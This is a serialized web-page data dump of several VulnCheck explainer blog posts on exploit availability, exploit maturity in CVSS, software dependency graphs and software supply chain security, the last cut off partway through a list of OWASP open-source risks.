value.",[25,41865,41866,41869],{},[295,41867,41868],{},"Network Tools and Automated Agents",": These tools can enhance an exploit's spread, increasing vulnerability scores.",[25,41871,41872,41875],{},[295,41873,41874],{},"Potential Impact:"," The harm attackers can cause if they exploit a vulnerability, such as remote code execution or zero-day exploitation.",[18,41877,41878],{},"The Common Vulnerability Scoring System (CVSS), supported by the National Vulnerability Database (NVD), uses exploitability as one of the qualitative measures for vulnerability severity.",[18,41880,41881],{},"Vulnerability and patch management teams use exploitability as one way to help them prioritize their remediation activities.",[61,41883,41885],{"id":41884},"what-is-exploit-availability","What is Exploit Availability?",[18,41887,41888,41889,41894],{},"Exploit Availability refers to the existence and accessibility of exploit code for identified vulnerabilities. Within ",[47,41890,41893],{"href":41891,"rel":41892},"https:\u002F\u002Fwww.first.org\u002Fcvss\u002Fv4-0\u002Fcvss-v40-specification.pdf",[51],"CVSS 4.0",", the Threat Metrics incorporate the following publicly available information when when adjusting a vulnerability’s severity:",[22,41896,41897,41903],{},[25,41898,41899,41902],{},[295,41900,41901],{},"Availability of proof-of-concept code",": Publicly available exploit code with sufficient technical details that indicate attackers may be able to exploit the vulnerability, even without knowledge of reported attempts or publicly available solutions to simplify attempts.",[25,41904,41905,41908],{},[295,41906,41907],{},"Active exploitation:"," Reports of attempted or successful attacks against the vulnerability with solutions that simplify the exploit attempts, like publicly or privately available exploit toolkits.",[18,41910,41911],{},"Understanding exploit availability helps prioritize remediation efforts, especially when dealing with zero-day and n-day vulnerabilities. Exploit availability can fall into three different categories:",[22,41913,41914,41920,41926],{},[25,41915,41916,41919],{},[295,41917,41918],{},"Publicly available",": Publicly accessible exploit",[25,41921,41922,41925],{},[295,41923,41924],{},"Commercially available",": Exploit available for purchase",[25,41927,41928,41931],{},[295,41929,41930],{},"Allegedly privately available",": Claims or rumors that an exploit is available privately",[61,41933,41935],{"id":41934},"what-is-the-known-exploited-vulnerability-kev-catalog","What is the Known Exploited Vulnerability (KEV) Catalog?",[18,41937,41938],{},"The Known Exploited Vulnerability (KEV) Catalog lists vulnerabilities that have assigned Common Vulnerabilities and Exposures (CVE) IDs with confirmed evidence of active exploitation by threat actors.",[18,41940,41941],{},"The KEV Catalog’s key feature include:",[22,41943,41944,41949,41955],{},[25,41945,41946,41948],{},[295,41947,40596],{},": Identifying and tracking CVE IDs provided by the CVE Program which is sponsored by CISA and operated by The MITRE Corporation.",[25,41950,41951,41954],{},[295,41952,41953],{},"Active Exploitation",": Each entry in the catalog has reliable evidence of being exploited in the wild, highlighting n-day vulnerabilities and zero-day exploitation.",[25,41956,41957,41960],{},[295,41958,41959],{},"Remediation Prioritization",": The catalog prioritizes those vulnerabilities that have clear remediation actions, such as updates provided by software vendors.",[18,41962,41963],{},"Security, vulnerability management, and patch management teams can use the KEV catalog to:",[22,41965,41966,41969,41972],{},[25,41967,41968],{},"Prioritize vulnerability management activities",[25,41970,41971],{},"Focus remediation and monitoring on actively exploited vulnerabilities",[25,41973,41974],{},"Optimize patching strategies or compensating control implementations to mitigate potential impacts",[61,41976,41978],{"id":41977},"why-is-exploit-availability-important","Why is Exploit Availability Important?",[18,41980,41981],{},"Exploit availability indicates whether exploit code for a specific vulnerability is accessible in public, commercial, or private formats, impacting the likelihood that threat actors will target the vulnerability to achieve their objectives.",[18,41983,41984],{},"Some benefits of using Exploit Availability as part of prioritizing vulnerability remediation include:",[22,41986,41987,41993,41999],{},[25,41988,41989,41992],{},[295,41990,41991],{},"Increased likelihood of exploitation",": While the existence of exploit code can increase the chances of successful exploitation, many vulnerabilities with exploit code remain unused so this should be only one factor used when prioritizing activities.",[25,41994,41995,41998],{},[295,41996,41997],{},"Early threat indicator",": The availability of exploits provides insight into threat actor thought processes and evolving attack methodologies, so security teams can proactively fortify defenses.",[25,42000,42001,42004],{},[295,42002,42003],{},"Vulnerability Management:"," While exploit availability aids in assessing the security posture and prioritizing remediation, vulnerability and patch management teams should prioritize active exploitation targeting specific entities.",[18,42006,42007],{},"When determining the potential impact that an available exploit can have, security teams should also consider:",[22,42009,42010,42013,42016],{},[25,42011,42012],{},"Attackers are more likely to use a publicly available exploit, making these vulnerabilities the highest priority.",[25,42014,42015],{},"Attackers often use commercial exploits for targeted attacks, so additional threat intelligence surrounding real-world attacks using the vulnerability can help understand whether the organization is more or less likely to be a victim.",[25,42017,42018],{},"Attackers often have limited access to and use of privately available exploits, influencing the risk and harm to individual organizations.",[61,42020,42022],{"id":42021},"what-challenges-do-security-teams-face-when-trying-to-understand-exploit-availability-for-their-environments","What Challenges do Security Teams Face When Trying to Understand Exploit Availability for Their Environments?",[18,42024,42025],{},"Security, vulnerability management, and patch management teams struggle to appropriately incorporate Exploit Availability into their vulnerability prioritization strategies.",[993,42027,42029],{"id":42028},"lack-of-comprehensive-exploit-intelligence","Lack of Comprehensive Exploit Intelligence",[18,42031,42032],{},"While the KEV Catalog provides information about known exploits, information about proof-of-concept, commercially available, and privately available exploits is difficult to find. The information is often dispersed across different threat actor communication channels, making it more difficult to consolidate all information about available exploits.",[993,42034,42036],{"id":42035},"lack-of-skills","Lack of Skills",[18,42038,42039],{},"Many security teams already struggle with the cybersecurity skills gap, making it more difficult to implement threat research. Without people who can monitor cybercriminal communications, these teams have no way to collect information unless it appears on the clear web.",[993,42041,42043],{"id":42042},"time-consuming-manual-processes","Time-Consuming Manual Processes",[18,42045,42046],{},"When security teams have the people who can monitor these communications, the process is time-consuming. Often, organizations need to dedicate a full time security analyst to infiltrate these communications channels or limit their research which leads to information gaps. These time-consuming processes mean that security teams often only receive information about exploit availability after threat actors have successfully used the vulnerability in an attack against the organization or someone else.",[993,42048,42050],{"id":42049},"lack-of-specialized-tools","Lack of Specialized Tools",[18,42052,42053],{},"While some security teams have dark web monitoring tools, these technologies often collect a wide array of threat information. Even when they integrate into the organization’s security information and event management (SIEM) solution, they may collect comprehensive information focused on vulnerability exploits.",[61,42055,42057],{"id":42056},"vulncheck-exploit-and-vulnerability-intelligence-for-informed-remediation-prioritization","VulnCheck: Exploit and Vulnerability Intelligence for Informed Remediation Prioritization",[18,42059,42060],{},"With VulnCheck organizations gain the insights they need into exploit availability so they can appropriately prioritize remediation activities. VulnCheck is an average of 14 days faster than the NVD for reporting vulnerabilities and provides the industry’s largest collection of exploit availability threat intelligence, and over 1 month faster vs CISA KEV. Our platform provides complete exploitation timelines covering vulnerability discovery and publication, discovery of exploit availability and exploitation, and vulnerability remediation publication.",{"title":219,"searchDepth":220,"depth":220,"links":42062},[42063,42064,42065,42066,42067,42073],{"id":41833,"depth":220,"text":41834},{"id":41884,"depth":220,"text":41885},{"id":41934,"depth":220,"text":41935},{"id":41977,"depth":220,"text":41978},{"id":42021,"depth":220,"text":42022,"children":42068},[42069,42070,42071,42072],{"id":42028,"depth":1266,"text":42029},{"id":42035,"depth":1266,"text":42036},{"id":42042,"depth":1266,"text":42043},{"id":42049,"depth":1266,"text":42050},{"id":42056,"depth":220,"text":42057},"2025-05-21","Exploit Intel 101 - Understanding Exploit Availability",{"slug":42077},"understanding-exploit-availability","\u002Fblog\u002Funderstanding-exploit-availability",{"title":41810,"description":42075},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-exploit-availability",[41494],"aBFfXivjKr0LQgm7_LyEhiVdn8Rn-SZL51fEm4Zs5Yw",{"id":42085,"title":42086,"articles":7,"authors":42087,"body":42089,"date":42074,"description":42349,"extension":234,"image":7,"link":7,"meta":42350,"navigation":237,"path":42352,"seo":42353,"series":42354,"stem":42355,"subtype":7,"tags":42356,"__hash__":42357},"blog\u002Fblog\u002Funderstanding-exploit-maturity.md","Understanding Exploit Maturity",[42088],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":42090,"toc":42336},[42091,42093,42113,42116,42119,42122,42125,42151,42154,42156,42160,42163,42166,42191,42195,42198,42201,42227,42231,42234,42238,42241,42261,42265,42268,42271,42291,42294,42298,42308,42328,42332,42334],[18,42092,41227],{},[22,42094,42095,42098,42101,42104,42107,42110],{},[25,42096,42097],{},"Definition of exploit maturity",[25,42099,42100],{},"Differences between exploit maturity and proof of concept exploit",[25,42102,42103],{},"Relationship between exploit maturity and vulnerability severity",[25,42105,42106],{},"Relationship between exploit maturity and vulnerability criticality",[25,42108,42109],{},"Impact of exploit maturity on the risk a vulnerability poses",[25,42111,42112],{},"How vulnerability management teams can use explicit maturity when prioritizing remediation actions",[18,42114,42115],{},"Exploit maturity is a metric that reflects the current state of exploit techniques for a specific vulnerability, the availability of exploit code, and active exploitation in the wild. Originally introduced as a temporal metric in the Common Vulnerability Scoring System (CVSS) v3.0, exploit maturity is now considered a threat metric in CVSS v.4.0.",[18,42117,42118],{},"This metric considers an exploit’s lifecycle from initial vulnerability discovery through threat actors’ ability to weaponize the vulnerability to gain unauthorized access or damage an IT system.",[18,42120,42121],{},"For example, while a theoretical exploit indicates that malicious actors could conceivably use a vulnerability to help achieve their objectives, easy-to-use exploit code available on the dark web means that less sophisticated or technical cybercriminals can deploy attacks more easily.",[18,42123,42124],{},"The exploit maturity metric includes four categories:",[22,42126,42127,42133,42139,42145],{},[25,42128,42129,42132],{},[295,42130,42131],{},"Not defined",": Default metric indicating a lack of reliable threat intelligence.",[25,42134,42135,42138],{},[295,42136,42137],{},"Proof of Concept:"," Threat intelligence indicates that theoretical exploit code is available but no reported attempts or publicly available solutions to simplify attempts exist.",[25,42140,42141,42144],{},[295,42142,42143],{},"Attacked:"," Threat intelligence indicates either known attempted or successful attacks already target the vulnerability, or tools to enable exploits are known to exist, such as exploit kits being sold on the dark web.",[25,42146,42147,42150],{},[295,42148,42149],{},"Unreported:"," Available threat intelligence indicates no publicly available proof-of-concept code, reported knowledge of exploit attempts, and no publicly available solutions that simplify attempts to exploit the vulnerability.",[18,42152,42153],{},"As the CVSS does not populate the exploit maturity values, organizations need sources of exploit intelligence that incorporate this information so they can implement the appropriate detections and remediation strategies.",[61,42155],{"id":219},[61,42157,42159],{"id":42158},"what-is-the-difference-between-exploit-maturity-and-a-proof-of-concept-exploit","What is the Difference Between Exploit Maturity and a Proof of Concept Exploit?",[18,42161,42162],{},"Proof of concept (PoC) is one stage of an exploit’s maturity. An exploit PoC is a preliminary demonstration showing how attackers could exploit the vulnerability, even if threat actors have not actually engaged in hostile activity in the wild.",[18,42164,42165],{},"The four primary differences between exploit maturity and exploit PoC are:",[22,42167,42168,42174,42180,42186],{},[25,42169,42170,42173],{},[295,42171,42172],{},"Definition",": Exploit maturity ranges from no exploit to fully weaponized exploit while exploit PoC only demonstrates an initial possibility.",[25,42175,42176,42179],{},[295,42177,42178],{},"Objective",": Exploit maturity enables organizations to prioritize their strategies based on attackers using a vulnerability while exploit PoC indicates a potential risk that may or may not come to fruition.",[25,42181,42182,42185],{},[295,42183,42184],{},"Stage in development",": Exploit maturity is a broader spectrum of threats and risks while exploit PoC is only an initial state prior to actual use.",[25,42187,42188,42190],{},[295,42189,32527],{},": Exploit maturity helps assess risk and potential real-world impact while exploit PoC validates a hypothetical way that attackers could use the vulnerability in an attack.",[61,42192,42194],{"id":42193},"how-does-exploit-maturity-impact-a-vulnerabilitys-severity","How Does Exploit Maturity Impact a Vulnerability’s Severity?",[18,42196,42197],{},"When the CVSS moved exploit maturity from a temporal to a threat metric, it highlighted the value that these insights provide when assessing a vulnerability’s severity. The threat metrics adjust a vulnerability’s severity by considering attackers’ ability to and ease of using the vulnerability over time to successfully achieve their objectives.",[18,42199,42200],{},"Organizations that consider exploit maturity’s relationship to vulnerability severity typically address the following:",[22,42202,42203,42209,42215,42221],{},[25,42204,42205,42208],{},[295,42206,42207],{},"Risk Perception",": Higher exploit maturity can correlate to greater exploitability which increases the perceived threat levels.",[25,42210,42211,42214],{},[295,42212,42213],{},"Actual Risk Impact",": Mature exploit code available publicly or privately allows less sophisticated and technical attackers to exploit the vulnerability, expanding the potential for harm to systems.",[25,42216,42217,42220],{},[295,42218,42219],{},"Severity Rating",": Vulnerabilities with mature exploit code receive higher severity ratings since real-world exploitation is more likely.",[25,42222,42223,42226],{},[295,42224,42225],{},"Threat Intelligence",": Weaponized and actively used exploits should be part of the threat intelligence that the security team gathers.",[61,42228,42230],{"id":42229},"how-does-exploit-maturity-impact-a-vulnerabilitys-criticality","How Does Exploit Maturity Impact a Vulnerability's Criticality?",[18,42232,42233],{},"The CVSS scoring system defines a critical vulnerability as one with a score between 9.0 and 10.0 based on its combined Base, Threat, and Environmental scores. The Threat score incorporates exploit maturity, ultimately increasing the overall CVSS score. For example, vulnerabilities that fall into the Attacked exploit maturity category likely have a higher overall CVSS score compared to similarly situated vulnerabilities that have an exploit maturity level defined as Unreported.",[61,42235,42237],{"id":42236},"how-does-exploit-maturity-impact-the-risk-a-vulnerability-poses-to-an-it-environment","How Does Exploit Maturity Impact the Risk a Vulnerability Poses to an IT Environment?",[18,42239,42240],{},"Security and vulnerability management teams should consider exploit maturity as a factor when determining the risk a vulnerability poses to their environments. As exploit techniques become more refined and accessible, the risk associated with a vulnerability can increase significantly. Some key considerations include:",[22,42242,42243,42249,42255],{},[25,42244,42245,42248],{},[295,42246,42247],{},"Exploit code availability",": If attackers are actively exploiting the vulnerability in the wild, they are also likely targeting the technology’s customer base.",[25,42250,42251,42254],{},[295,42252,42253],{},"Operationalization of the exploit",": If the exploit is available for private or public sale, then more malicious actors can compromise systems that incorporate the technology and the IT environment’s risk increases.",[25,42256,42257,42260],{},[295,42258,42259],{},"Current security controls",": To exploit a vulnerability, attackers need to be able to reach it within the context of the organization’s current security and system architecture so compensating controls, like network segmentation, may decrease risk.",[61,42262,42264],{"id":42263},"how-does-exploit-maturity-help-vulnerability-management-teams-prioritize-remediation-efforts","How Does Exploit Maturity Help Vulnerability Management Teams Prioritize Remediation Efforts?",[18,42266,42267],{},"Exploit maturity significantly enhances vulnerability management by enabling teams to prioritize their remediation actions more effectively.",[18,42269,42270],{},"Some key benefits of using exploit maturity when trying to prioritize vulnerability remediation include:",[22,42272,42273,42279,42285],{},[25,42274,42275,42278],{},[295,42276,42277],{},"Efficient Resource Allocation:"," Filtering vulnerabilities by exploit maturity allows teams to dedicate efforts towards addressing those with active threats that pose increased data breach risks.",[25,42280,42281,42284],{},[295,42282,42283],{},"Rapid Identification:"," Quickly ascertaining vulnerabilities with known exploits enables organizations to address critical issues faster.",[25,42286,42287,42290],{},[295,42288,42289],{},"Informed Decision-Making:"," The inclusion of Exploit Code Maturity within the CVSS Threat Metrics guides prioritization efforts by offering an assessment of present exploitability which correlates to potential increased risk.",[61,42292],{"id":42293},"_1",[61,42295,42297],{"id":42296},"how-does-exploit-intelligence-incorporate-exploit-maturity","How Does Exploit Intelligence Incorporate Exploit Maturity?",[61,42299,42301,42302,42307],{"id":42300},"as-the-number-of-vulnerabilities-continues-to-grow-security-and-vulnerability-remediation-teams-need-information-about-the-ones-that-malicious-actors-are-most-likely-to-use-in-an-attack-attackers-exploit-or-are-likely-to-exploit-only-about-2-3-of-disclosed-vulnerabilities-exploit-intelligence-incorporates-a-vulnerabilitys-technical-information-and-exploit-maturity-then-correlates-it-with-additional-context-like","As the number of vulnerabilities continues to grow, security and vulnerability remediation teams need information about the ones that malicious actors are most likely to use in an attack. Attackers exploit or are likely to exploit only about 2-3% of disclosed vulnerabilities. ",[47,42303,42306],{"href":42304,"rel":42305},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fexploit-intelligence",[51],"Exploit Intelligence"," incorporates a vulnerability’s technical information and exploit maturity then correlates it with additional context like",[22,42309,42310,42316,42322],{},[25,42311,42312,42315],{},[295,42313,42314],{},"Exploit type",": Adversary objectives, like gaining initial access, stealing sensitive information, or disrupting business operations.",[25,42317,42318,42321],{},[295,42319,42320],{},"Exploit timelines",": An exploit’s evolution from PoC to available publicly or privately to help predict a vulnerability’s future potential impact.",[25,42323,42324,42327],{},[295,42325,42326],{},"Threat intelligence:"," Information about known threats, like ransomware families, botnets, and named threat actors, for actionable insights that help prioritize next steps.",[61,42329,42331],{"id":42330},"vulncheck-exploit-intelligence-breadth-and-depth-of-vulnerability-and-exploit-maturity-information","VulnCheck Exploit Intelligence: Breadth and Depth of Vulnerability and Exploit Maturity Information",[18,42333,41467],{},[18,42335,41470],{},{"title":219,"searchDepth":220,"depth":220,"links":42337},[42338,42339,42340,42341,42342,42343,42344,42345,42346,42348],{"id":219,"depth":220,"text":219},{"id":42158,"depth":220,"text":42159},{"id":42193,"depth":220,"text":42194},{"id":42229,"depth":220,"text":42230},{"id":42236,"depth":220,"text":42237},{"id":42263,"depth":220,"text":42264},{"id":42293,"depth":220,"text":219},{"id":42296,"depth":220,"text":42297},{"id":42300,"depth":220,"text":42347},"As the number of vulnerabilities continues to grow, security and vulnerability remediation teams need information about the ones that malicious actors are most likely to use in an attack. Attackers exploit or are likely to exploit only about 2-3% of disclosed vulnerabilities. Exploit Intelligence incorporates a vulnerability’s technical information and exploit maturity then correlates it with additional context like",{"id":42330,"depth":220,"text":42331},"Exploit Intel 101 - Understanding Exploit Maturity",{"slug":42351},"understanding-exploit-maturity","\u002Fblog\u002Funderstanding-exploit-maturity",{"title":42086,"description":42349},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-exploit-maturity",[41494],"jJ4MVcn7-JJGfrn0N7iyiJgLH1IZzKXKsXLfxhy2i_8",{"id":42359,"title":42360,"articles":7,"authors":42361,"body":42363,"date":42074,"description":42581,"extension":234,"image":7,"link":7,"meta":42582,"navigation":237,"path":42584,"seo":42585,"series":42586,"stem":42587,"subtype":7,"tags":42588,"__hash__":42589},"blog\u002Fblog\u002Funderstanding-software-dependency-graphs.md","Understanding Software Dependency Graphs",[42362],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":42364,"toc":42558},[42365,42368,42382,42386,42389,42392,42412,42416,42419,42423,42426,42430,42433,42437,42440,42444,42447,42451,42454,42458,42461,42465,42468,42472,42475,42479,42482,42486,42489,42492,42495,42499,42502,42506,42515,42519,42522,42533,42537,42540,42551,42555],[18,42366,42367],{},"This knowledge base article will support a fundamental understanding of:",[22,42369,42370,42373,42376,42379],{},[25,42371,42372],{},"The definition and key features of a software dependency graph",[25,42374,42375],{},"Uses for software dependency graphs",[25,42377,42378],{},"Why developers struggle with generating accurate software dependency graphs",[25,42380,42381],{},"Best practices for building accurate dependency graphs",[61,42383,42385],{"id":42384},"what-is-a-software-dependency-graph","What is a Software Dependency Graph?",[18,42387,42388],{},"A software dependency graph visualizes the complex web of a software system’s components, including modules, libraries, and frameworks. By representing these as nodes, the dependency graph shows connections between them so software developers can see and understand interactions between these different elements.",[18,42390,42391],{},"Typically, dependency graphs use one of the following visual representation formats:",[22,42393,42394,42400,42406],{},[25,42395,42396,42399],{},[295,42397,42398],{},"Dependency matrix",": Grid-like representation displaying nodes across rows and columns to help identify circular dependencies where a node depends on itself.",[25,42401,42402,42405],{},[295,42403,42404],{},"Adjacency list",": List format with directed connections between entities identified under each node to detail dependencies across software packages or modules and understand component interlinking.",[25,42407,42408,42411],{},[295,42409,42410],{},"Linked nodes",": Visualization of linked nodes that connects them using directed edges for insight for insight into an application’s architecture and potential conflicts, reducing the number of circular relationships",[61,42413,42415],{"id":42414},"why-is-it-important-to-understand-software-dependencies","Why is it Important to Understand Software Dependencies?",[18,42417,42418],{},"Dependencies can introduce potential issues or even cause system failures if not managed properly. When developers add new dependencies, conflicts with existing components might arise, leading to compatibility issues. Effectively managing dependencies also helps reduce vulnerabilities that attackers can use to compromise systems and networks. Key aspects include:",[993,42420,42422],{"id":42421},"transparency-across-third-party-components-and-libraries","Transparency Across Third-party Components and Libraries",[18,42424,42425],{},"Dependency graphs reveal the structure of the different components that developers incorporate into the software. As software becomes more complex, the dependency graphs enable developers to gain a clear view of all components involved, including open-source components.",[993,42427,42429],{"id":42428},"cross-file-analysis","Cross-file Analysis",[18,42431,42432],{},"A single application may incorporate code written in multiple programming languages. Cross-file analysis provides a unified view of dependencies for insight into interconnectedness across multiple files. This process tracks, documents, and accounts for all dependencies, regardless of varying file paths or appearances. By reducing blind spots in dependency tracking, developers can improve the software’s security posture.",[993,42434,42436],{"id":42435},"visibility-into-potential-vulnerabilities","Visibility into Potential Vulnerabilities",[18,42438,42439],{},"By providing visibility across different ecosystems and package relationships, dependency graphs enable developers to identify potential vulnerabilities. The graphs outline direct and transitive dependencies which AppSec teams can use to pinpoint and mitigate vulnerabilities without relying on lockfiles. By mapping indirect dependencies, AppSec teams reduce the human error risks from manual processes to make informed, data-driven security decisions.",[993,42441,42443],{"id":42442},"path-analysis","Path Analysis",[18,42445,42446],{},"Path analysis uses algorithms to map connections between components so developers can identify the chain of dependencies between two points. Developers can identify the shortest or most critical paths between two nodes which helps with debugging and performance tracing.",[993,42448,42450],{"id":42449},"impact-analysis","Impact Analysis",[18,42452,42453],{},"While path analysis tells developers how components are connected, impact analysis tells them how a change will affect the downstream dependencies. WIth an impact analysis, developers can determine the ripple effect or blast radius that refactoring or change management can have across the software.",[61,42455,42457],{"id":42456},"why-do-developers-struggle-to-build-accurate-software-dependency-graphs","Why do Developers Struggle to Build Accurate Software Dependency Graphs?",[18,42459,42460],{},"Developers often find it challenging to construct accurate software dependency graphs due to the complex nature of modern software projects. As projects grow, they involve more methods, libraries, frameworks, and components. Tasks like documenting dependencies can become tedious and overwhelming, especially without automating the process. Key contributing factors include:",[993,42462,42464],{"id":42463},"free-and-open-source-software-foss","Free and Open Source Software (FOSS)",[18,42466,42467],{},"Developers increasingly incorporate FOSS components into their software. As the number of components increases, software dependency graphs grow in size and complexity. While developers may know the direct dependencies within their source code, they often lose sight of the downstream, or transitive, dependencies that FOSS introduces.",[993,42469,42471],{"id":42470},"shadow-code","Shadow Code",[18,42473,42474],{},"Shadow code is untracked or unofficial dependencies in a codebase that are not part of the official dependency list. Since they are not declared in package manifests, developers have a hard time tracking and auditing them. Since they lack documentation, they can introduce security risks or licensing issues.",[993,42476,42478],{"id":42477},"decentralized-teams","Decentralized Teams",[18,42480,42481],{},"In a remote working world, developers can collaborate from anywhere. Decentralized development teams can make building an accurate dependency graph challenging because people managing their own modules in different tools or with different processes can lead to inconsistent or missing data that leaves a graph incomplete.",[993,42483,42485],{"id":42484},"technology-limitations","Technology Limitations",[18,42487,42488],{},"Depending on the team’s tooling, the technologies may have limitations that impact a dependency graph’s accuracy. Manifest files and lockfiles may not include all dependencies, especially if files from other sources are directly checked into a repository. Additionally, vulnerability data can be incomplete or not timely, impacting the accuracy of the dependency graph.",[61,42490,42381],{"id":42491},"best-practices-for-building-accurate-dependency-graphs",[18,42493,42494],{},"A reliable software dependency graph acts as a guide, showing each part of the code and how the parts rely on each other. With these insights, organizations can improve their application security by understanding how an attacker or a vulnerability can impact the software for improved remediation prioritization.",[993,42496,42498],{"id":42497},"use-a-software-composition-analysis-sca-tool","Use a Software Composition Analysis (SCA) Tool",[18,42500,42501],{},"SCA tools display how the different parts of software relate to each other and work together. They enable developers to automate many processes related to creating dependency graphs.",[993,42503,42505],{"id":42504},"generate-a-software-bill-of-materials-sbom","Generate a Software Bill of Materials (SBOM)",[18,42507,42508,42509,42514],{},"An SBOM lists all components and dependencies within a project, including direct and transitive dependencies. They use ",[47,42510,42513],{"href":42511,"rel":42512},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulnerability-exchange-formats",[51],"structured, hierarchical formats",", like CycloneDX, to provide a complete map dependencies, including metadata that highlights the paths through which these dependencies are connected.",[993,42516,42518],{"id":42517},"edit-layers-and-dependencies","Edit Layers and Dependencies",[18,42520,42521],{},"Reviewing and editing the dependency graph ensures that it adequately describes the components and how they interact. Some edits may include:",[22,42523,42524,42527,42530],{},[25,42525,42526],{},"Removing unnecessary dependencies that may have been mistakenly added",[25,42528,42529],{},"Changing or restricting a dependency's direction to clarify how different software components interact with one another",[25,42531,42532],{},"Refining how each artifact relates to the various layers within the system can promote a better-organized project structure.",[993,42534,42536],{"id":42535},"validate-code-against-graph","Validate Code Against Graph",[18,42538,42539],{},"Validating code against the dependency graph involves checking for any conflicts between what the code currently contains and what the diagram represents. The process helps:",[22,42541,42542,42545,42548],{},[25,42543,42544],{},"Identify components that may be impacted by recent changes",[25,42546,42547],{},"Providing insights into code that requires further examination or modification",[25,42549,42550],{},"Ensuring a smooth transition when moving elements to different architectures",[61,42552,42554],{"id":42553},"prioritizing-remediation-with-vulncheck","Prioritizing remediation with VulnCheck",[18,42556,42557],{},"VulnCheck’s Exploit & Vulnerability Intelligence enables developers to prioritize remediation efforts by focusing on the vulnerabilities that attackers are actively exploiting. Our complete exploitation timelines covers the vulnerability’s initial disclosure, evidence of first discovered exploit, and when remediation was provided.",{"title":219,"searchDepth":220,"depth":220,"links":42559},[42560,42561,42568,42574,42580],{"id":42384,"depth":220,"text":42385},{"id":42414,"depth":220,"text":42415,"children":42562},[42563,42564,42565,42566,42567],{"id":42421,"depth":1266,"text":42422},{"id":42428,"depth":1266,"text":42429},{"id":42435,"depth":1266,"text":42436},{"id":42442,"depth":1266,"text":42443},{"id":42449,"depth":1266,"text":42450},{"id":42456,"depth":220,"text":42457,"children":42569},[42570,42571,42572,42573],{"id":42463,"depth":1266,"text":42464},{"id":42470,"depth":1266,"text":42471},{"id":42477,"depth":1266,"text":42478},{"id":42484,"depth":1266,"text":42485},{"id":42491,"depth":220,"text":42381,"children":42575},[42576,42577,42578,42579],{"id":42497,"depth":1266,"text":42498},{"id":42504,"depth":1266,"text":42505},{"id":42517,"depth":1266,"text":42518},{"id":42535,"depth":1266,"text":42536},{"id":42553,"depth":220,"text":42554},"Exploit Intel 101 - Understanding Software Dependency Graphs",{"slug":42583},"understanding-software-dependency-graphs","\u002Fblog\u002Funderstanding-software-dependency-graphs",{"title":42360,"description":42581},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-software-dependency-graphs",[41494],"mfGo3PZX5iuWGzR8maNB5fmw9xLC9KsSSLRqsSVIQMk",{"id":42591,"title":42592,"articles":7,"authors":42593,"body":42595,"date":42074,"description":43043,"extension":234,"image":7,"link":7,"meta":43044,"navigation":237,"path":43046,"seo":43047,"series":43048,"stem":43049,"subtype":7,"tags":43050,"__hash__":43051},"blog\u002Fblog\u002Funderstanding-software-supply-chain-security.md","Understanding Software Supply Chain Security",[42594],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":42596,"toc":43027},[42597,42600,42617,42620,42624,42627,42630,42656,42660,42663,42666,42692,42696,42705,42772,42775,42809,42813,42816,42848,42852,42855,42875,42879,42882,42885,42917,42921,42924,42928,42931,42942,42946,42949,42960,42964,42967,42978,42982,42985,42999,43003,43006,43020,43024],[18,42598,42599],{},"This knowledgebase article will cover:",[22,42601,42602,42605,42608,42611,42614],{},[25,42603,42604],{},"Definitions for software supply chain and software supply chain security",[25,42606,42607],{},"Where software supply chain risks fall on the OWASP Top 10",[25,42609,42610],{},"Why the software supply chain is vulnerable to attack",[25,42612,42613],{},"Sources of supply chain security risks",[25,42615,42616],{},"Best practices for mitigating risk",[18,42618,42619],{},"The software supply chain refers to the network of components, tools, processes, and third-party services involved in developing, building, and delivering software. Recognizing the importance of these tools and components, attackers increasingly target the software supply chain. By focusing attention on software supply chain security, organizations can reduce data breach risks arising from these attacks.",[61,42621,42623],{"id":42622},"what-is-the-software-supply-chain","What is the Software Supply Chain?",[18,42625,42626],{},"The software supply chain comprises a variety of code, libraries, dependencies, and infrastructure, which is used throughout the development lifecycle.",[18,42628,42629],{},"Key components include:",[22,42631,42632,42638,42644,42650],{},[25,42633,42634,42637],{},[295,42635,42636],{},"Source code",": Original code to build the software’s or application’s core functionalities.",[25,42639,42640,42643],{},[295,42641,42642],{},"Third-party dependencies and libraries",": Proprietary and open-source tools, libraries, and components integrated into source code to save developers time.",[25,42645,42646,42649],{},[295,42647,42648],{},"Build and packaging processes",": Compiling the code and packages into a deployable software.",[25,42651,42652,42655],{},[295,42653,42654],{},"Deployment infrastructure",": Releasing the software or application on cloud platforms or on-premises servers so people can use it.",[61,42657,42659],{"id":42658},"what-is-software-supply-chain-security","What is Software Supply Chain Security?",[18,42661,42662],{},"Software supply chain security is the practice of reviewing and protecting every component across the software development life cycle (SDLC) from compromise, tampering, or unauthorized access.",[18,42664,42665],{},"As attackers increasingly insert malicious code into or otherwise compromise third-party libraries, organizations need to mitigate risk by:",[22,42667,42668,42674,42680,42686],{},[25,42669,42670,42673],{},[295,42671,42672],{},"Protecting source code",": Securing the original code against unauthorized access",[25,42675,42676,42679],{},[295,42677,42678],{},"Identifying dependencies and libraries",": Reviewing third-party and open-source components for potential vulnerabilities",[25,42681,42682,42685],{},[295,42683,42684],{},"Engaging in real-time monitoring",": Leveraging threat intelligence to constantly observe the software supply chain for new threats",[25,42687,42688,42691],{},[295,42689,42690],{},"Automating audits",": Scanning code and all third-party components to identify and remediate vulnerabilities",[61,42693,42695],{"id":42694},"which-top-10-security-risks-involve-issues-with-the-software-supply-chain","Which Top 10 Security Risks Involve Issues with the Software Supply Chain?",[18,42697,42698,42699,42704],{},"OWASP offers several Top 10 lists that highlight key security risks across different areas of application security. The ",[47,42700,42703],{"href":42701,"rel":42702},"https:\u002F\u002Fowasp.org\u002Fwww-project-open-source-software-top-10\u002F",[51],"OWASP Top 10 Risks for Open Source Software (OSS)"," outlines the biggest security risks in open source code, helping address key threats in the software supply chain. The Top 10 OSS Risks include the following:",[22,42706,42707,42713,42719,42725,42731,42737,42748,42754,42760,42766],{},[25,42708,42709,42712],{},[295,42710,42711],{},"OSS-RISK-1 Known Vulnerabilities",": Component contains publicly disclosed vulnerabilities, like those published through CVE, GitHub Security Advisories, or other channels.",[25,42714,42715,42718],{},[295,42716,42717],{},"OSS-RISK-2 Compromise of Legitimate Packages",": Attackers compromise parts of legitimate projects or their distribution infrastructure to 